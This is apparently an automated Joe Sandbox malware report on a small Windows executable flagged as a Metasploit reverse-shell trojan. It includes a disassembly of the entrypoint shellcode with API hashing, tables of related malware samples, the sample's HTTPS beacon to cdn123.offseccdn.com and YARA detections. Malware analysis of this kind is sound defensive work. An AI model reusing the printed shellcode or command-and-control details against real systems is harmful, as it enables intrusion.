https://www.blackberry.com | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865381329.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488458239.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488542177.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865696292.0000000002B90000.00000040.00001000.00020000.00000000.sdmp | false | | high
https://www.blackberry.com2rI | 443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
74.82.70.131 | good.com | Canada | 18705 | RIMBLACKBERRYCA | false
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1636969
                            Start date and time:2025-03-13 09:52:25 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 29s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:443_2003_https-df.exe
                            Detection:MAL
                            Classification:mal96.troj.winEXE@2/6@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 67%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.71.93.126, 40.126.31.73, 4.175.87.197
                            • Excluded domains from analysis (whitelisted): onedsblobvmssprdeus02.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
good.com | SecuriteInfo.com.Win32.SpywareX-gen.27164.12067.exe | malicious | SystemBC | 52.60.87.163
good.com | https://kissingwills555.github.io/teethteeth | malicious | Outlook Phishing, HTMLPhisher | 108.179.193.59
good.com | https://down.acting-good.com/ | malicious | Unknown | 104.21.89.148
good.com | http://linkangood.com/21ef897172770ca75d.js | malicious | Unknown | 5.149.254.180
good.com | http://linkangood.com | malicious | Unknown | 5.149.254.210
good.com | https://www.nireos.com/hyperspectral-imaging/ | malicious | Unknown | 5.149.254.180
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RIMBLACKBERRYCA | yakov.spc.elf | malicious | Mirai | 216.9.249.37
RIMBLACKBERRYCA | z0r0.x86.elf | malicious | Mirai | 68.171.249.33
RIMBLACKBERRYCA | g4za.x86.elf | malicious | Unknown | 68.171.249.25
RIMBLACKBERRYCA | mpsl.elf | malicious | Unknown | 67.223.68.118
RIMBLACKBERRYCA | loligang.ppc.elf | malicious | Mirai | 208.93.75.245
RIMBLACKBERRYCA | arm5.nn.elf | malicious | Mirai, Okiru | 206.124.114.77
RIMBLACKBERRYCA | loligang.arm.elf | malicious | Mirai | 68.171.237.10
RIMBLACKBERRYCA | m68k.elf | malicious | Unknown | 67.223.69.122
RIMBLACKBERRYCA | la.bot.arm5.elf | malicious | Mirai | 68.171.237.27
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | faktura_FV2025020637756.html | malicious | Unknown | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.26489.28570.exe | malicious | Unknown | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | Bill Of Ladding & PL AWB No.1669134316.vbs | malicious | GuLoader | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | malicious | Remcos, GuLoader | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | comprobante de pago.exe | malicious | GuLoader | 74.82.70.131
37f463bf4616ecd445d4a1937da06e19 | comprobante de pago.exe | malicious | GuLoader | 74.82.70.131
                            No context
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.0043118873206132
                            Encrypted:false
                            SSDEEP:96:IaFuu8d9sbhEod7JfTQXIDcQqc6mcEKcw34eE+HbHg/KAgOg0dl/phsv5o1OyWCB:rAuk9D0kigMSjZThGzuiFNZ24lO87
                            MD5:816CD8139B4D91B343BBE2FD5B5669D6
                            SHA1:26EF2DD05D0EE26A8268BC8EF5D2149FB58818B5
                            SHA-256:BD1ADF49D3C67F976463F8D87089F709B6936F8FB0E148FBADFD6F510A810812
                            SHA-512:0688D06C54431B8ED4AE7BBA1591AFF6F30145D32B1AEA8563688A49FFB7806F7570E7C1B65AFFB81B01BF4D160EC0A683BD96B37B4C4A490F3DA8ADC935179C
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.2.9.6.2.6.2.5.9.5.3.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.2.9.6.2.6.7.2.8.2.8.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.e.a.c.d.d.8.-.2.0.d.4.-.4.e.2.7.-.9.6.f.f.-.3.b.3.3.8.a.8.f.f.3.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.f.c.8.d.7.c.-.1.4.d.d.-.4.5.5.3.-.b.6.e.6.-.5.b.b.b.f.6.6.5.7.3.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.9.-.2.0.0.6.-.2.8.6.c.f.5.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.2.6.6.3.5.8.5.1.8.7.a.0.b.2.c.d.1.c.4.4.a.2.6.6.2.e.9.9.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.5.4.b.e.8.8.7.9.b.4.5.8.c.0.3.4.3.4.0.b.1.9.3.1.1.b.a.a.4.2.2.1.8.c.2.1.6.d.!.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Thu Mar 13 08:53:46 2025, 0x1205a4 type
                            Category:dropped
                            Size (bytes):160232
                            Entropy (8bit):1.4455567755816838
                            Encrypted:false
                            SSDEEP:768:Q9yIcQwFsCuvAjvgfQ7YAgc4bha62wl9nb:QfmsCuojvgfQ7YAgc4bha6lpb
                            MD5:4C68CF5BD7F33C1A8634D0FD61F20EFC
                            SHA1:E377645193489767B605CBD408334261FA2473C6
                            SHA-256:3088D5D3B17D1C855992AC9CD6590152260B512063E754F8479A849D21CF62DF
                            SHA-512:053CBA7AD2105624D5040FCF9A622FD9C11B03CC2B26EA790473DBE10E5B83D0C755B24739B4350A1538C3B782B9DD2AB6A69DC70F267AEF32FE6FA47FC1F45A
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ..........g.........................................c..........T.......8...........T...........xG..p*........... ..........."..............................................................................eJ......D#......Lw......................T.......\......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8796
                            Entropy (8bit):3.7088820347658764
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJlun+JB6YZ3M5gmfZ4bQpD989bSEcfRGm:R6lXJEW6Y5KgmfZUSnf5
                            MD5:55F5B04232CF560F9EA65012DD2FD3D8
                            SHA1:BEB9F65D1B8BF9624E6D39636244BE6E68BED464
                            SHA-256:C9D04123B874D0E5FCA9351C837CDD7EED13D9853E507235A967427FCB04A7F6
                            SHA-512:E1B57A7B1FB9A3D88A0CC150F289D06527EE62872244495153654055753ABF8E30A85948508B6DD5E77847879931DE1F6387BCD98720C429EACFF4EA673C67E7
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4719
                            Entropy (8bit):4.505808223938844
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsfJg771I9GZWpW8VYWRYm8M4JDtOKFNyq85kCOhLLBJBd:uIjfBI7No7VoJJJMCLdJBd
                            MD5:74BA99FF1048E90ACC17715F863A6C48
                            SHA1:80A577EBFF5F6E196A8BC1828887119C8FEB3FF5
                            SHA-256:4DCE9CA2A9DF3162AEC3E3128C5FC289A787CF1B31ACA8336A63A827815BD3C5
                            SHA-512:4FE0D8DA1B5F370B22540C5D78D9D66D935C28B46482711861C481CB39BC7BB26FD391497C050B22166DCE0C3B5B4B1B59D996B7107A05BCA4B9718824900444
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758876" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.473442401912993
                            Encrypted:false
                            SSDEEP:6144:q9Zfpi6ceLPx9skLmb0fUZWSP3aJG8nAge03BQqZaKFFIeC/DNcXRtdLrI:eZHtUZWOcxQqYzruhtC
                            MD5:18886A7E33CC39A4A70276BEEF3F4EEC
                            SHA1:6452F4999F663EF588066E6C60F3BC2FE32B6219
                            SHA-256:C98B82A7E261E52502066C5B9E87093E70AE5B7DB28AC02E7307726AD9E997B8
                            SHA-512:2113766E13C26580C4C92CC23B766740375AFEBE2A9B5C45F1C078C991C1F1905254D466FE30F8B50AE9DDF2AD6C935342D4121F2B57B0EE5E1D3DAB8D2A5C2B
                            Malicious:false
                            Reputation:low
                            Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................|.M ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):3.922787775675884
                            Encrypted:false
                            SSDEEP:768:yvwDoUrCjyutmUu/fR86dzsjO2qloWysUe/a9X:yvkuMUuHhIbms
                            MD5:14C6160A38CB8FEDF4E16D851D6CB4AA
                            SHA1:D872E876F61941A74B9C620195894105511FD0D2
                            SHA-256:74F0146024163CEF2AFC3BBDDA34AF3FCE4876D6677D99CCE0CF36B1A8CDA67B
                            SHA-512:A960007DD8FD3F944DEB8097569BB49F16EC8F8E270475788C47BD2682A07CDC0A1E352DE94E7B7CF2CB21EE3EF9EE8259DDF998188E3C09AA3B54CE5C55D143
                            Malicious:false
                            Reputation:low
                            Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................z.M HvLE.n......K............Mt...........Np..................................... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........^...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...
                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):1.7373895378352873
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:443_2003_https-df.exe
                            File size:7'168 bytes
                            MD5:8d9c0f42baf129d1b430a01463dd7870
                            SHA1:4054be8879b458c034340b19311baa42218c216d
                            SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
                            SHA512:02831aafecd02359f63e8f13f50835ccd1e76abfd23b9586156351ca3ce5f7e1cb9846a6c64f538c9a9c9d2b96a0317a10ae5b6ef4631d67b30da61ba3b8db02
                            SSDEEP:24:eFGStrJ9u0/6ikY/nZd8rBQAV2G1Y+HKkn2DOIRwQ78IW29buoR9svcJBepmB:is0mYb4BQWq+H7CO1Q7PWAqoRikJDB
                            TLSH:D2E1B32372391CF6C89C463B4A63D04B65489B347F27E3FA8B14020FB9F201139B1C86
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=..|E..t=..|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@...
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x140004000
                            Entrypoint Section:.jcho
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4BC63C7D [Wed Apr 14 22:06:53 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:b4c6fff030479aa3b12625be67bf4914
Instruction (disassembly from the entrypoint 0x140004000)
                            cld
                            dec eax
                            and esp, FFFFFFF0h
                            call 00007F4F04C09661h
                            inc ecx
                            push ecx
                            inc ecx
                            push eax
                            push edx
                            push ecx
                            dec eax
                            xor edx, edx
                            push esi
                            dec eax
                            mov edx, dword ptr [edx+60h]
                            dec eax
                            mov edx, dword ptr [edx+18h]
                            dec eax
                            mov edx, dword ptr [edx+20h]
                            dec eax
                            movzx ecx, word ptr [edx+4Ah]
                            dec eax
                            mov esi, dword ptr [edx+50h]
                            dec ebp
                            xor ecx, ecx
                            dec eax
                            xor eax, eax
                            lodsb
                            cmp al, 61h
                            jl 00007F4F04C09594h
                            sub al, 20h
                            inc ecx
                            ror ecx, 0Dh
                            inc ecx
                            add ecx, eax
                            loop 00007F4F04C0957Fh
                            push edx
                            inc ecx
                            push ecx
                            dec eax
                            mov edx, dword ptr [edx+20h]
                            mov eax, dword ptr [edx+3Ch]
                            dec eax
                            add eax, edx
                            cmp word ptr [eax+18h], 020Bh
                            jne 00007F4F04C09608h
                            mov eax, dword ptr [eax+00000088h]
                            dec eax
                            test eax, eax
                            je 00007F4F04C095F9h
                            dec eax
                            add eax, edx
                            inc esp
                            mov eax, dword ptr [eax+20h]
                            mov ecx, dword ptr [eax+18h]
                            dec ecx
                            add eax, edx
                            push eax
                            jecxz 00007F4F04C095E8h
                            dec eax
                            dec ecx
                            inc ecx
                            mov esi, dword ptr [eax+ecx*4]
                            dec ebp
                            xor ecx, ecx
                            dec eax
                            add esi, edx
                            dec eax
                            xor eax, eax
                            lodsb
                            inc ecx
                            ror ecx, 0Dh
                            inc ecx
                            add ecx, eax
                            cmp al, ah
                            jne 00007F4F04C09583h
                            dec esp
                            add ecx, dword ptr [esp+08h]
                            inc ebp
                            cmp ecx, edx
                            jne 00007F4F04C0956Ah
                            pop eax
                            inc esp
                            mov eax, dword ptr [eax+24h]
                            dec ecx
                            add eax, edx
                            inc cx
                            mov ecx, dword ptr [eax+ecx*2]
                            inc esp
                            mov eax, dword ptr [eax+1Ch]
                            dec ecx
                            add eax, edx
                            inc ecx
                            mov eax, dword ptr [eax+ecx*4]
                            dec eax
                            add eax, edx
                            inc ecx
                            pop eax
                            inc ecx
                            pop eax
                            pop esi
                            pop ecx
                            pop edx
                            inc ecx
                            pop eax
                            inc ecx
                            pop ecx
                            inc ecx
                            pop edx
                            dec eax
                            sub esp, 20h
                            inc ecx
                            Programming Language:
                            • [IMP] VS2005 build 50727
                            • [ASM] VS2008 SP1 build 30729
                            • [LNK] VS2008 SP1 build 30729
                            Name                                  Virtual Address  Virtual Size  Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x4358           0x6c          .jcho
                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x43c8           0x8           .jcho
                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IAT             0x3000           0x18          .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                            Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
                            .text   0x1000           0x104e        0x1200    a4a5deae25708a9e05f50bcad7075c86  False     0.025390625      data       0.16810049402497224  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata  0x3000           0x84          0x200     31b58e4b44359a1fdeebdccbe8f7a423  False     0.158203125      data       0.9669929845987311   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .jcho   0x4000           0x3d0         0x400     d3df8e69479d1cf00626de02acc9eeda  False     0.8193359375     data       6.142036294099521    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLL           Import
                            KERNEL32.dll  VirtualAlloc, ExitProcess


                            • Total Packets: 12
                            • 443 (HTTPS)
                            • 53 (DNS)
                            Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                            Mar 13, 2025 09:53:44.384361029 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:44.384401083 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:44.384483099 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:44.398005962 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:44.398025036 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:46.675270081 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:46.675396919 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:46.763468027 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:46.763504028 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:46.763788939 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:46.763889074 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:46.765553951 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:46.812325001 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:47.207443953 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:47.207525969 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:47.207550049 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:47.207619905 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:47.208234072 CET  49683        443        192.168.2.6   74.82.70.131
                            Mar 13, 2025 09:53:47.208292961 CET  443          49683      74.82.70.131  192.168.2.6
                            Mar 13, 2025 09:53:47.208359957 CET  49683        443        192.168.2.6   74.82.70.131
                            Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                            Mar 13, 2025 09:53:44.345118999 CET  50729        53         192.168.2.6  1.1.1.1
                            Mar 13, 2025 09:53:44.360882998 CET  53           50729      1.1.1.1      192.168.2.6

                            Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name      Type            Class        DNS over HTTPS
                            Mar 13, 2025 09:53:44.345118999 CET  192.168.2.6  1.1.1.1  0xb4c     Standard query (0)  good.com  A (IP address)  IN (0x0001)  false

                            Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name      CName  Address       Type            Class        DNS over HTTPS
                            Mar 13, 2025 09:53:44.360882998 CET  1.1.1.1    192.168.2.6  0xb4c     No error (0)  good.com         74.82.70.131  A (IP address)  IN (0x0001)  false
                            • cdn123.offseccdn.com
                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            0           192.168.2.6  49683        74.82.70.131    443               7004  C:\Users\user\Desktop\443_2003_https-df.exe
                            Timestamp: 2025-03-13 08:53:46 UTC, Bytes transferred: 346, Direction: OUT
                            GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1
                            Host: cdn123.offseccdn.com
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                            Cache-Control: no-cache

                            Timestamp: 2025-03-13 08:53:47 UTC, Bytes transferred: 198, Direction: IN
                            HTTP/1.1 302 Found
                            Date: Thu, 13 Mar 2025 08:53:46 GMT
                            Server: Apache
                            Location: https://www.blackberry.com
                            Content-Length: 210
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1

                            Timestamp: 2025-03-13 08:53:47 UTC, Bytes transferred: 210, Direction: IN
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 61 63 6b 62 65 72 72 79 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.blackberry.com">here</a>.</p></body></html>



                            Target ID: 1
                            Start time: 04:53:42
                            Start date: 13/03/2025
                            Path: C:\Users\user\Desktop\443_2003_https-df.exe
                            Wow64 process (32bit): false
                            Commandline: "C:\Users\user\Desktop\443_2003_https-df.exe"
                            Imagebase: 0x140000000
                            File size: 7'168 bytes
                            MD5 hash: 8D9C0F42BAF129D1B430A01463DD7870
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
